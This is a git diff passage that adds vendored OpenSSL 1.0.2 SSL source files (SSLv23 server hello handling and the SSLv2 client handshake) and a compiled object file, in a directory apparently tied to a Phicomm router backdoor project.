+        if ((csl + sil + cl + 11) != s->packet_length) { /* We can't have TLS
+                                                          * extensions in SSL
+                                                          * 2.0 format *
+                                                          * Client Hello, can
+                                                          * we? Error
+                                                          * condition should
+                                                          * be * '>'
+                                                          * otherweise */
+            SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO,
+                   SSL_R_RECORD_LENGTH_MISMATCH);
+            goto err;
+        }
+
+        /* record header: msg_type ... */
+        *(d++) = SSL3_MT_CLIENT_HELLO;
+        /* ... and length (actual value will be written later) */
+        d_len = d;
+        d += 3;
+
+        /* client_version */
+        *(d++) = SSL3_VERSION_MAJOR; /* == v[0] */
+        *(d++) = v[1];
+
+        /* lets populate the random area */
+        /* get the challenge_length */
+        i = (cl > SSL3_RANDOM_SIZE) ? SSL3_RANDOM_SIZE : cl;
+        memset(d, 0, SSL3_RANDOM_SIZE);
+        memcpy(&(d[SSL3_RANDOM_SIZE - i]), &(p[csl + sil]), i);
+        d += SSL3_RANDOM_SIZE;
+
+        /* no session-id reuse */
+        *(d++) = 0;
+
+        /* ciphers */
+        j = 0;
+        dd = d;
+        d += 2;
+        for (i = 0; i < csl; i += 3) {
+            if (p[i] != 0)
+                continue;
+            *(d++) = p[i + 1];
+            *(d++) = p[i + 2];
+            j += 2;
+        }
+        s2n(j, dd);
+
+        /* COMPRESSION */
+        *(d++) = 1;
+        *(d++) = 0;
+
+#if 0
+        /* copy any remaining data with may be extensions */
+        p = p + csl + sil + cl;
+        while (p < s->packet + s->packet_length) {
+            *(d++) = *(p++);
+        }
+#endif
+
+        i = (d - (unsigned char *)s->init_buf->data) - 4;
+        l2n3((long)i, d_len);
+
+        /* get the data reused from the init_buf */
+        s->s3->tmp.reuse_message = 1;
+        s->s3->tmp.message_type = SSL3_MT_CLIENT_HELLO;
+        s->s3->tmp.message_size = i;
+    }
+
+    /* imaginary new state (for program structure): */
+    /* s->state = SSL23_SR_CLNT_HELLO_C */
+
+    if (type == 1) {
+#ifdef OPENSSL_NO_SSL2
+        SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO, SSL_R_UNSUPPORTED_PROTOCOL);
+        goto err;
+#else
+        /* we are talking sslv2 */
+        /*
+         * we need to clean up the SSLv3/TLSv1 setup and put in the sslv2
+         * stuff.
+         */
+
+        if (s->s2 == NULL) {
+            if (!ssl2_new(s))
+                goto err;
+        } else
+            ssl2_clear(s);
+
+        if (s->s3 != NULL)
+            ssl3_free(s);
+
+        if (!BUF_MEM_grow_clean(s->init_buf,
+                                SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER)) {
+            goto err;
+        }
+
+        s->state = SSL2_ST_GET_CLIENT_HELLO_A;
+        if (s->options & SSL_OP_NO_TLSv1 && s->options & SSL_OP_NO_SSLv3)
+            s->s2->ssl2_rollback = 0;
+        else
+            /*
+             * reject SSL 2.0 session if client supports SSL 3.0 or TLS 1.0
+             * (SSL 3.0 draft/RFC 2246, App. E.2)
+             */
+            s->s2->ssl2_rollback = 1;
+
+        /*
+         * setup the n bytes we have read so we get them from the sslv2
+         * buffer
+         */
+        s->rstate = SSL_ST_READ_HEADER;
+        s->packet_length = n;
+        s->packet = &(s->s2->rbuf[0]);
+        memcpy(s->packet, buf, n);
+        s->s2->rbuf_left = n;
+        s->s2->rbuf_offs = 0;
+
+        s->method = SSLv2_server_method();
+        s->handshake_func = s->method->ssl_accept;
+#endif
+    }
+
+    if ((type == 2) || (type == 3)) {
+        /*
+         * we have SSLv3/TLSv1 (type 2: SSL2 style, type 3: SSL3/TLS style)
+         */
+        const SSL_METHOD *new_method;
+        new_method = ssl23_get_server_method(s->version);
+        if (new_method == NULL) {
+            SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO, SSL_R_UNSUPPORTED_PROTOCOL);
+            goto err;
+        }
+        s->method = new_method;
+
+        if (!ssl_init_wbio_buffer(s, 1))
+            goto err;
+
+        /* we are in this state */
+        s->state = SSL3_ST_SR_CLNT_HELLO_A;
+
+        if (type == 3) {
+            /*
+             * put the 'n' bytes we have read into the input buffer for SSLv3
+             */
+            s->rstate = SSL_ST_READ_HEADER;
+            s->packet_length = n;
+            if (s->s3->rbuf.buf == NULL)
+                if (!ssl3_setup_read_buffer(s))
+                    goto err;
+
+            s->packet = &(s->s3->rbuf.buf[0]);
+            memcpy(s->packet, buf, n);
+            s->s3->rbuf.left = n;
+            s->s3->rbuf.offset = 0;
+        } else {
+            s->packet_length = 0;
+            s->s3->rbuf.left = 0;
+            s->s3->rbuf.offset = 0;
+        }
+#if 0                           /* ssl3_get_client_hello does this */
+        s->client_version = (v[0] << 8) | v[1];
+#endif
+        s->handshake_func = s->method->ssl_accept;
+    }
+
+    if ((type < 1) || (type > 3)) {
+        /* bad, very bad */
+        SSLerr(SSL_F_SSL23_GET_CLIENT_HELLO, SSL_R_UNKNOWN_PROTOCOL);
+        goto err;
+    }
+    s->init_num = 0;
+
+    if (buf != buf_space)
+        OPENSSL_free(buf);
+    return (SSL_accept(s));
+ err:
+    if (buf != buf_space)
+        OPENSSL_free(buf);
+    return (-1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_srvr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s23_srvr.o
new file mode 100644
index 0000000000000000000000000000000000000000..06fbd7f3111cfd26ffe124dcd49ac602fa015388
GIT binary patch
literal 8280
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
C8t#n%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_clnt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_clnt.c
new file mode 100644
index 0000000..69da6b1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_clnt.c
@@ -0,0 +1,1094 @@
+/* ssl/s2_clnt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_SSL2
+# include <stdio.h>
+# include <openssl/rand.h>
+# include <openssl/buffer.h>
+# include <openssl/objects.h>
+# include <openssl/evp.h>
+
+static const SSL_METHOD *ssl2_get_client_method(int ver);
+static int get_server_finished(SSL *s);
+static int get_server_verify(SSL *s);
+static int get_server_hello(SSL *s);
+static int client_hello(SSL *s);
+static int client_master_key(SSL *s);
+static int client_finished(SSL *s);
+static int client_certificate(SSL *s);
+static int ssl_rsa_public_encrypt(SESS_CERT *sc, int len, unsigned char *from,
+                                  unsigned char *to, int padding);
+# define BREAK   break
+
+static const SSL_METHOD *ssl2_get_client_method(int ver)
+{
+    if (ver == SSL2_VERSION)
+        return (SSLv2_client_method());
+    else
+        return (NULL);
+}
+
+IMPLEMENT_ssl2_meth_func(SSLv2_client_method,
+                         ssl_undefined_function,
+                         ssl2_connect, ssl2_get_client_method)
+
+int ssl2_connect(SSL *s)
+{
+    unsigned long l = (unsigned long)time(NULL);
+    BUF_MEM *buf = NULL;
+    int ret = -1;
+    void (*cb) (const SSL *ssl, int type, int val) = NULL;
+    int new_state, state;
+
+    RAND_add(&l, sizeof(l), 0);
+    ERR_clear_error();
+    clear_sys_error();
+
+    if (s->info_callback != NULL)
+        cb = s->info_callback;
+    else if (s->ctx->info_callback != NULL)
+        cb = s->ctx->info_callback;
+
+    /* init things to blank */
+    s->in_handshake++;
+    if (!SSL_in_init(s) || SSL_in_before(s))
+        SSL_clear(s);
+
+    for (;;) {
+        state = s->state;
+
+        switch (s->state) {
+        case SSL_ST_BEFORE:
+        case SSL_ST_CONNECT:
+        case SSL_ST_BEFORE | SSL_ST_CONNECT:
+        case SSL_ST_OK | SSL_ST_CONNECT:
+
+            s->server = 0;
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_START, 1);
+
+            s->version = SSL2_VERSION;
+            s->type = SSL_ST_CONNECT;
+
+            buf = s->init_buf;
+            if ((buf == NULL) && ((buf = BUF_MEM_new()) == NULL)) {
+                ret = -1;
+                goto end;
+            }
+            if (!BUF_MEM_grow(buf, SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER)) {
+                if (buf == s->init_buf)
+                    buf = NULL;
+                ret = -1;
+                goto end;
+            }
+            s->init_buf = buf;
+            buf = NULL;
+            s->init_num = 0;
+            s->state = SSL2_ST_SEND_CLIENT_HELLO_A;
+            s->ctx->stats.sess_connect++;
+            s->handshake_func = ssl2_connect;
+            BREAK;
+
+        case SSL2_ST_SEND_CLIENT_HELLO_A:
+        case SSL2_ST_SEND_CLIENT_HELLO_B:
+            s->shutdown = 0;
+            ret = client_hello(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL2_ST_GET_SERVER_HELLO_A;
+            BREAK;
+
+        case SSL2_ST_GET_SERVER_HELLO_A:
+        case SSL2_ST_GET_SERVER_HELLO_B:
+            ret = get_server_hello(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            if (!s->hit) {      /* new session */
+                s->state = SSL2_ST_SEND_CLIENT_MASTER_KEY_A;
+                BREAK;
+            } else {
+                s->state = SSL2_ST_CLIENT_START_ENCRYPTION;
+                break;
+            }
+
+        case SSL2_ST_SEND_CLIENT_MASTER_KEY_A:
+        case SSL2_ST_SEND_CLIENT_MASTER_KEY_B:
+            ret = client_master_key(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL2_ST_CLIENT_START_ENCRYPTION;
+            break;
+
+        case SSL2_ST_CLIENT_START_ENCRYPTION:
+            /*
+             * Ok, we now have all the stuff needed to start encrypting, so
+             * lets fire it up :-)
+             */
+            if (!ssl2_enc_init(s, 1)) {
+                ret = -1;
+                goto end;
+            }
+            s->s2->clear_text = 0;
+            s->state = SSL2_ST_SEND_CLIENT_FINISHED_A;
+            break;
+
+        case SSL2_ST_SEND_CLIENT_FINISHED_A:
+        case SSL2_ST_SEND_CLIENT_FINISHED_B:
+            ret = client_finished(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL2_ST_GET_SERVER_VERIFY_A;
+            break;
+
+        case SSL2_ST_GET_SERVER_VERIFY_A:
+        case SSL2_ST_GET_SERVER_VERIFY_B:
+            ret = get_server_verify(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL2_ST_GET_SERVER_FINISHED_A;
+            break;
+
+        case SSL2_ST_GET_SERVER_FINISHED_A:
+        case SSL2_ST_GET_SERVER_FINISHED_B:
+            ret = get_server_finished(s);
+            if (ret <= 0)
+                goto end;
+            break;
+
+        case SSL2_ST_SEND_CLIENT_CERTIFICATE_A:
+        case SSL2_ST_SEND_CLIENT_CERTIFICATE_B:
+        case SSL2_ST_SEND_CLIENT_CERTIFICATE_C:
+        case SSL2_ST_SEND_CLIENT_CERTIFICATE_D:
+        case SSL2_ST_X509_GET_CLIENT_CERTIFICATE:
+            ret = client_certificate(s);
+            if (ret <= 0)
+                goto end;
+            s->init_num = 0;
+            s->state = SSL2_ST_GET_SERVER_FINISHED_A;
+            break;
+
+        case SSL_ST_OK:
+            if (s->init_buf != NULL) {
+                BUF_MEM_free(s->init_buf);
+                s->init_buf = NULL;
+            }
+            s->init_num = 0;
+            /*      ERR_clear_error(); */
+
+            /*
+             * If we want to cache session-ids in the client and we
+             * successfully add the session-id to the cache, and there is a
+             * callback, then pass it out. 26/11/96 - eay - only add if not a
+             * re-used session.
+             */
+
+            ssl_update_cache(s, SSL_SESS_CACHE_CLIENT);
+            if (s->hit)
+                s->ctx->stats.sess_hit++;
+
+            ret = 1;
+            /* s->server=0; */
+            s->ctx->stats.sess_connect_good++;
+
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_DONE, 1);
+
+            goto end;
+            /* break; */
+        default:
+            SSLerr(SSL_F_SSL2_CONNECT, SSL_R_UNKNOWN_STATE);
+            return (-1);
+            /* break; */
+        }
+
+        if ((cb != NULL) && (s->state != state)) {
+            new_state = s->state;
+            s->state = state;
+            cb(s, SSL_CB_CONNECT_LOOP, 1);
+            s->state = new_state;
+        }
+    }
+ end:
+    s->in_handshake--;
+    if (buf != NULL)
+        BUF_MEM_free(buf);
+    if (cb != NULL)
+        cb(s, SSL_CB_CONNECT_EXIT, ret);
+    return (ret);
+}
+
+static int get_server_hello(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p;
+    int i, j;
+    unsigned long len;
+    STACK_OF(SSL_CIPHER) *sk = NULL, *cl, *prio, *allow;
+
+    buf = (unsigned char *)s->init_buf->data;
+    p = buf;
+    if (s->state == SSL2_ST_GET_SERVER_HELLO_A) {
+        i = ssl2_read(s, (char *)&(buf[s->init_num]), 11 - s->init_num);
+        if (i < (11 - s->init_num))
+            return (ssl2_part_read(s, SSL_F_GET_SERVER_HELLO, i));
+        s->init_num = 11;
+
+        if (*(p++) != SSL2_MT_SERVER_HELLO) {
+            if (p[-1] != SSL2_MT_ERROR) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_READ_WRONG_PACKET_TYPE);
+            } else
+                SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_PEER_ERROR);
+            return (-1);
+        }
+# if 0
+        s->hit = (*(p++)) ? 1 : 0;
+        /*
+         * Some [PPC?] compilers fail to increment p in above statement, e.g.
+         * one provided with Rhapsody 5.5, but most recent example XL C 11.1
+         * for AIX, even without optimization flag...
+         */
+# else
+        s->hit = (*p) ? 1 : 0;
+        p++;
+# endif
+        s->s2->tmp.cert_type = *(p++);
+        n2s(p, i);
+        if (i < s->version)
+            s->version = i;
+        n2s(p, i);
+        s->s2->tmp.cert_length = i;
+        n2s(p, i);
+        s->s2->tmp.csl = i;
+        n2s(p, i);
+        s->s2->tmp.conn_id_length = i;
+        s->state = SSL2_ST_GET_SERVER_HELLO_B;
+    }
+
+    /* SSL2_ST_GET_SERVER_HELLO_B */
+    len =
+        11 + (unsigned long)s->s2->tmp.cert_length +
+        (unsigned long)s->s2->tmp.csl +
+        (unsigned long)s->s2->tmp.conn_id_length;
+    if (len > SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER) {
+        SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_MESSAGE_TOO_LONG);
+        return -1;
+    }
+    j = (int)len - s->init_num;
+    i = ssl2_read(s, (char *)&(buf[s->init_num]), j);
+    if (i != j)
+        return (ssl2_part_read(s, SSL_F_GET_SERVER_HELLO, i));
+    if (s->msg_callback) {
+        /* SERVER-HELLO */
+        s->msg_callback(0, s->version, 0, buf, (size_t)len, s,
+                        s->msg_callback_arg);
+    }
+
+    /* things are looking good */
+
+    p = buf + 11;
+    if (s->hit) {
+        if (s->s2->tmp.cert_length != 0) {
+            SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_REUSE_CERT_LENGTH_NOT_ZERO);
+            return (-1);
+        }
+        if (s->s2->tmp.cert_type != 0) {
+            if (!(s->options & SSL_OP_SSLREF2_REUSE_CERT_TYPE_BUG)) {
+                SSLerr(SSL_F_GET_SERVER_HELLO,
+                       SSL_R_REUSE_CERT_TYPE_NOT_ZERO);
+                return (-1);
+            }
+        }
+        if (s->s2->tmp.csl != 0) {
+            SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_REUSE_CIPHER_LIST_NOT_ZERO);
+            return (-1);
+        }
+    } else {
+# if 0
+        /* very bad */
+        memset(s->session->session_id, 0,
+               SSL_MAX_SSL_SESSION_ID_LENGTH_IN_BYTES);
+        s->session->session_id_length = 0;
+# endif
+
+        /*
+         * we need to do this in case we were trying to reuse a client
+         * session but others are already reusing it. If this was a new
+         * 'blank' session ID, the session-id length will still be 0
+         */
+        if (s->session->session_id_length > 0) {
+            if (!ssl_get_new_session(s, 0)) {
+                ssl2_return_error(s, SSL2_PE_UNDEFINED_ERROR);
+                return (-1);
+            }
+        }
+
+        if (ssl2_set_certificate(s, s->s2->tmp.cert_type,
+                                 s->s2->tmp.cert_length, p) <= 0) {
+            ssl2_return_error(s, SSL2_PE_BAD_CERTIFICATE);
+            return (-1);
+        }
+        p += s->s2->tmp.cert_length;
+
+        if (s->s2->tmp.csl == 0) {
+            ssl2_return_error(s, SSL2_PE_NO_CIPHER);
+            SSLerr(SSL_F_GET_SERVER_HELLO, SSL_R_NO_CIPHER_LIST);
+            return (-1);
